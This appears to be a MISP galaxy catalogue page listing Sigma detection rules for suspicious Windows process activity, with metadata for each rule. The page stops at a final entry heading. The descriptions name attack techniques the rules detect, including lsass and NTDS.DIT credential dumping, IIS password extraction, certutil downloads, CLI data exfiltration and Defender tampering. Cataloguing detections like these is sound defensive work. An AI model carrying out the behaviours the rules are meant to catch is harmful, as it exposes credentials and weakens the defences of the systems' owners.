UUID 0e0255bf-2548-47b8-9582-c0955c9283f5 which can be used as unique global reference for Suspicious Reg Add BitLocker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-11-15
falsepositive ['Unlikely']
filename proc_creation_win_reg_bitlocker.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1486']
Related clusters

To see the related clusters, click here.

Suspicious ZipExec Execution

ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.

Internal MISP references

UUID 90dcf730-1b71-4ae7-9ffc-6fcf62bd0132 which can be used as unique global reference for Suspicious ZipExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-11-07
falsepositive ['Unknown']
filename proc_creation_win_hktl_zipexec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Rundll32 Execution Without Parameters

Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module

Internal MISP references

UUID 5bb68627-3198-40ca-b458-49f973db8752 which can be used as unique global reference for Rundll32 Execution Without Parameters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bartlomiej Czyz, Relativity
creation_date 2021-01-31
falsepositive ['False positives may occur if a user called rundll32 from CLI with no options']
filename proc_creation_win_rundll32_without_parameters.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.t1021.002', 'attack.t1570', 'attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Potential Signing Bypass Via Windows Developer Features

Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.

Internal MISP references

UUID a383dec4-deec-4e6e-913b-ed9249670848 which can be used as unique global reference for Potential Signing Bypass Via Windows Developer Features in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-01-11
falsepositive ['Unknown']
filename proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Suspicious Child Process Of Manage Engine ServiceDesk

Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service

Internal MISP references

UUID cea2b7ea-792b-405f-95a1-b903ea06458f which can be used as unique global reference for Suspicious Child Process Of Manage Engine ServiceDesk in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023-01-18
falsepositive ['Legitimate sub processes started by Manage Engine ServiceDesk Pro']
filename proc_creation_win_java_manageengine_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1102']
Related clusters

To see the related clusters, click here.

User Added To Highly Privileged Group

Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".

Internal MISP references

UUID 10fb649c-3600-4d37-b1e6-56ea90bb7e09 which can be used as unique global reference for User Added To Highly Privileged Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-02-23
falsepositive ['Administrative activity that must be investigated']
filename proc_creation_win_susp_add_user_privileged_group.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

HackTool - LocalPotato Execution

Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples

Internal MISP references

UUID 6bd75993-9888-4f91-9404-e1e4e4e34b77 which can be used as unique global reference for HackTool - LocalPotato Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-14
falsepositive ['Unlikely']
filename proc_creation_win_hktl_localpotato.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'cve.2023-21746']

Greedy File Deletion Using Del

Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.

Internal MISP references

UUID 204b17ae-4007-471b-917b-b917b315c5db which can be used as unique global reference for Greedy File Deletion Using Del in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113 , X__Junior (Nextron Systems)
creation_date 2021-12-02
falsepositive ['Unknown']
filename proc_creation_win_cmd_del_greedy_deletion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Obfuscated PowerShell OneLiner Execution

Detects the execution of a specific OneLiner to download and execute powershell modules in memory.

Internal MISP references

UUID 44e24481-6202-4c62-9127-5a0ae8e3fe3d which can be used as unique global reference for Obfuscated PowerShell OneLiner Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @Kostastsale, TheDFIRReport
creation_date 2022-05-09
falsepositive ['Unknown']
filename proc_creation_win_powershell_download_cradle_obfuscated.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1059.001', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Encoded Command Patterns

Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains

Internal MISP references

UUID b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c which can be used as unique global reference for Suspicious PowerShell Encoded Command Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-05-24
falsepositive ['Other tools that work with encoded scripts in the command line instead of script files']
filename proc_creation_win_powershell_base64_encoded_cmd_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

UAC Bypass Using NTFS Reparse Point - Process

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

Internal MISP references

UUID 39ed3c80-e6a1-431b-9df3-911ac53d08a7 which can be used as unique global reference for UAC Bypass Using NTFS Reparse Point - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_ntfs_reparse_point.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell

Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.

Internal MISP references

UUID c3d76afc-93df-461e-8e67-9b2bad3f2ac4 which can be used as unique global reference for File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @Kostastsale
creation_date 2022-12-22
falsepositive ['Unknown']
filename proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1135']
Related clusters

To see the related clusters, click here.

Renamed BrowserCore.EXE Execution

Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)

Internal MISP references

UUID 8a4519e8-e64a-40b6-ae85-ba8ad2177559 which can be used as unique global reference for Renamed BrowserCore.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022-06-02
falsepositive ['Unknown']
filename proc_creation_win_renamed_browsercore.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.defense-evasion', 'attack.t1528', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Potential Network Sniffing Activity Using Network Tools

Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Internal MISP references

UUID ba1f7802-adc7-48b4-9ecb-81e227fddfd5 which can be used as unique global reference for Potential Network Sniffing Activity Using Network Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019-10-21
falsepositive ['Legitimate administration activity to troubleshoot network issues']
filename proc_creation_win_susp_network_sniffing.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.discovery', 'attack.t1040']
Related clusters

To see the related clusters, click here.

UEFI Persistence Via Wpbbin - ProcessCreation

Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section

Internal MISP references

UUID 4abc0ec4-db5a-412f-9632-26659cddf145 which can be used as unique global reference for UEFI Persistence Via Wpbbin - ProcessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-18
falsepositive ['Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)']
filename proc_creation_win_wpbbin_potential_persistence.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1542.001']
Related clusters

To see the related clusters, click here.

Malicious Base64 Encoded PowerShell Keywords in Command Lines

Detects base64 encoded strings used in hidden malicious PowerShell command lines

Internal MISP references

UUID f26c6093-6f14-4b12-800f-0fcb46f5ffd0 which can be used as unique global reference for Malicious Base64 Encoded PowerShell Keywords in Command Lines in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author John Lambert (rule)
creation_date 2019-01-16
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_hidden_flag.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Psexec Execution

Detects user accept agreement execution in psexec commandline

Internal MISP references

UUID 730fc21b-eaff-474b-ad23-90fd265d4988 which can be used as unique global reference for Psexec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72
creation_date 2020-10-30
falsepositive ['Administrative scripts.']
filename proc_creation_win_sysinternals_psexec_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.lateral-movement', 'attack.t1569', 'attack.t1021']
Related clusters

To see the related clusters, click here.

Interesting Service Enumeration Via Sc.EXE

Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.

Internal MISP references

UUID e83e8899-c9b2-483b-b355-5decc942b959 which can be used as unique global reference for Interesting Service Enumeration Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2024-02-12
falsepositive ['Unknown']
filename proc_creation_win_sc_query_interesting_services.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.t1003', 'attack.credential-access']
Related clusters

To see the related clusters, click here.

Chromium Browser Instance Executed With Custom Extension

Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension

Internal MISP references

UUID 88d6e60c-759d-4ac1-a447-c0f1466c2d21 which can be used as unique global reference for Chromium Browser Instance Executed With Custom Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aedan Russell, frack113, X__Junior (Nextron Systems)
creation_date 2022-06-19
falsepositive ['Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert']
filename proc_creation_win_browsers_chromium_load_extension.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1176.001']
Related clusters

To see the related clusters, click here.

Suspicious Service DACL Modification Via Set-Service Cmdlet

Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable

Internal MISP references

UUID a95b9b42-1308-4735-a1af-abb1c5e6f5ac which can be used as unique global reference for Suspicious Service DACL Modification Via Set-Service Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-18
falsepositive ['Unknown']
filename proc_creation_win_powershell_service_dacl_modification_set_service.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Python Function Execution Security Warning Disabled In Excel

Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.

Internal MISP references

UUID 023c654f-8f16-44d9-bb2b-00ff36a62af9 which can be used as unique global reference for Python Function Execution Security Warning Disabled In Excel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @Kostastsale
creation_date 2023-08-22
falsepositive ['Unknown']
filename proc_creation_win_registry_office_disable_python_security_warnings.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

PUA - NPS Tunneling Tool Execution

Detects the use of NPS, a port forwarding and intranet penetration proxy server

Internal MISP references

UUID 68d37776-61db-42f5-bf54-27e87072d17e which can be used as unique global reference for PUA - NPS Tunneling Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-10-08
falsepositive ['Legitimate use']
filename proc_creation_win_pua_nps.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

Indirect Command Execution From Script File Via Bash.EXE

Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.

Internal MISP references

UUID 2d22a514-e024-4428-9dba-41505bd63a5b which can be used as unique global reference for Indirect Command Execution From Script File Via Bash.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-15
falsepositive ['Unknown']
filename proc_creation_win_bash_file_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Remote Access Tool - Anydesk Execution From Suspicious Folder

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 065b00ca-5d5c-4557-ac95-64a6d0b64d86 which can be used as unique global reference for Remote Access Tool - Anydesk Execution From Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-05-20
falsepositive ['Legitimate use of AnyDesk from a non-standard folder']
filename proc_creation_win_remote_access_tools_anydesk_susp_exec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Suspicious Processes Spawned by WinRM

Detects suspicious processes including shells spawnd from WinRM host process

Internal MISP references

UUID 5cc2cda8-f261-4d88-a2de-e9e193c86716 which can be used as unique global reference for Suspicious Processes Spawned by WinRM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades), Markus Neis
creation_date 2021-05-20
falsepositive ['Legitimate WinRM usage']
filename proc_creation_win_winrm_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1190', 'attack.initial-access', 'attack.persistence', 'attack.privilege-escalation']
Related clusters

To see the related clusters, click here.

Suspicious Windows Defender Registry Key Tampering Via Reg.EXE

Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection

Internal MISP references

UUID 452bce90-6fb0-43cc-97a5-affc283139b3 which can be used as unique global reference for Suspicious Windows Defender Registry Key Tampering Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-03-22
falsepositive ['Rare legitimate use by administrators to test software (should always be investigated)']
filename proc_creation_win_reg_windows_defender_tamper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 which can be used as unique global reference for Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2021-07-20
falsepositive ['Unknown']
filename proc_creation_win_powershell_zip_compress.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1074.001']
Related clusters

To see the related clusters, click here.

Potential Data Exfiltration Activity Via CommandLine Tools

Detects the use of various CLI utilities exfiltrating data via web requests

Internal MISP references

UUID 7d1aaf3d-4304-425c-b7c3-162055e0b3ab which can be used as unique global reference for Potential Data Exfiltration Activity Via CommandLine Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-02
falsepositive ['Unlikely']
filename proc_creation_win_susp_data_exfiltration_via_cli.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

ManageEngine Endpoint Central Dctask64.EXE Potential Abuse

Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.

Internal MISP references

UUID 6345b048-8441-43a7-9bed-541133633d7a which can be used as unique global reference for ManageEngine Endpoint Central Dctask64.EXE Potential Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020-01-28
falsepositive ['Unknown']
filename proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1055.001']
Related clusters

To see the related clusters, click here.

Remote Access Tool - RURAT Execution From Unusual Location

Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')

Internal MISP references

UUID e01fa958-6893-41d4-ae03-182477c5e77d which can be used as unique global reference for Remote Access Tool - RURAT Execution From Unusual Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-19
falsepositive ['Unknown']
filename proc_creation_win_remote_access_tools_rurat_non_default_location.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Use of FSharp Interpreters

Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" Both can be used for AWL bypass and to execute F# code via scripts or inline.

Internal MISP references

UUID b96b2031-7c17-4473-afe7-a30ce714db29 which can be used as unique global reference for Use of FSharp Interpreters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022-06-02
falsepositive ['Legitimate use by a software developer.']
filename proc_creation_win_fsi_fsharp_code_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

SQLite Chromium Profile Data DB Access

Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.

Internal MISP references

UUID 24c77512-782b-448a-8950-eddb0785fc71 which can be used as unique global reference for SQLite Chromium Profile Data DB Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author TropChaud
creation_date 2022-12-19
falsepositive ['Unknown']
filename proc_creation_win_sqlite_chromium_profile_data.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1539', 'attack.t1555.003', 'attack.collection', 'attack.t1005']
Related clusters

To see the related clusters, click here.

Potentially Suspicious ASP.NET Compilation Via AspNetCompiler

Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.

Internal MISP references

UUID 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 which can be used as unique global reference for Potentially Suspicious ASP.NET Compilation Via AspNetCompiler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-14
falsepositive ['Unknown']
filename proc_creation_win_aspnet_compiler_susp_paths.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

HackTool - XORDump Execution

Detects suspicious use of XORDump process memory dumping utility

Internal MISP references

UUID 66e563f9-1cbd-4a22-a957-d8b7c0f44372 which can be used as unique global reference for HackTool - XORDump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-01-28
falsepositive ['Another tool that uses the command line switches of XORdump']
filename proc_creation_win_hktl_xordump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036', 'attack.t1003.001', 'attack.credential-access']
Related clusters

To see the related clusters, click here.

Suspicious WebDav Client Execution Via Rundll32.EXE

Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397

Internal MISP references

UUID 982e9f2d-1a85-4d5b-aea4-31f5e97c6555 which can be used as unique global reference for Suspicious WebDav Client Execution Via Rundll32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2023-03-16
falsepositive ['Unknown']
filename proc_creation_win_rundll32_webdav_client_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.003', 'cve.2023-23397']
Related clusters

To see the related clusters, click here.

TrustedPath UAC Bypass Pattern

Detects indicators of a UAC bypass method by mocking directories

Internal MISP references

UUID 4ac47ed3-44c2-4b1f-9d51-bf46e8914126 which can be used as unique global reference for TrustedPath UAC Bypass Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-08-27
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_trustedpath.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Renamed Msdt.EXE Execution

Detects the execution of a renamed "Msdt.exe" binary

Internal MISP references

UUID bd1c6866-65fc-44b2-be51-5588fcff82b9 which can be used as unique global reference for Renamed Msdt.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022-06-03
falsepositive ['Unlikely']
filename proc_creation_win_renamed_msdt.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

HKTL - SharpSuccessor Privilege Escalation Tool Execution

Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments. Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability.

Internal MISP references

UUID 38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8 which can be used as unique global reference for HKTL - SharpSuccessor Privilege Escalation Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-06-06
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpsuccessor_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Process Access via TrolleyExpress Exclusion

Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory

Internal MISP references

UUID 4c0aaedc-154c-4427-ada0-d80ef9c9deb6 which can be used as unique global reference for Process Access via TrolleyExpress Exclusion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-02-10
falsepositive ['Unknown']
filename proc_creation_win_citrix_trolleyexpress_procdump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.011', 'attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Potential Product Reconnaissance Via Wmic.EXE

Detects the execution of WMIC in order to get a list of firewall and antivirus products

Internal MISP references

UUID 15434e33-5027-4914-88d5-3d4145ec25a9 which can be used as unique global reference for Potential Product Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali
creation_date 2023-02-14
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_product.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Suspicious Download Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files.

Internal MISP references

UUID 19b08b1c-861d-4e75-a1ef-ea0c1baf202b which can be used as unique global reference for Suspicious Download Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-15
falsepositive ['Unknown']
filename proc_creation_win_certutil_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Suspicious Modification Of Scheduled Tasks

Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on Instead they modify the task after creation to include their malicious payload

Internal MISP references

UUID 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b which can be used as unique global reference for Suspicious Modification Of Scheduled Tasks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-28
falsepositive ['Unknown']
filename proc_creation_win_schtasks_change.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Sensitive File Dump Via Wbadmin.EXE

Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.

Internal MISP references

UUID 8b93a509-1cb8-42e1-97aa-ee24224cdc15 which can be used as unique global reference for Sensitive File Dump Via Wbadmin.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2024-05-10
falsepositive ['Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis.']
filename proc_creation_win_wbadmin_dump_sensitive_files.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Odbcconf.EXE Suspicious DLL Location

Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.

Internal MISP references

UUID 6b65c28e-11f3-46cb-902a-68f2cafaf474 which can be used as unique global reference for Odbcconf.EXE Suspicious DLL Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-22
falsepositive ['Unlikely']
filename proc_creation_win_odbcconf_exec_susp_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Replace.exe Usage

Detects the use of Replace.exe which can be used to replace file with another file

Internal MISP references

UUID 9292293b-8496-4715-9db6-37028dcda4b3 which can be used as unique global reference for Replace.exe Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-03-06
falsepositive ['Unknown']
filename proc_creation_win_lolbin_replace.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Microsoft IIS Service Account Password Dumped

Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords

Internal MISP references

UUID 2d3cdeec-c0db-45b4-aa86-082f7eb75701 which can be used as unique global reference for Microsoft IIS Service Account Password Dumped in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Janantha Marasinghe, Elastic (original idea)
creation_date 2022-11-08
falsepositive ['Unknown']
filename proc_creation_win_iis_appcmd_service_account_password_dumped.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Suspicious Copy From or To System Directory

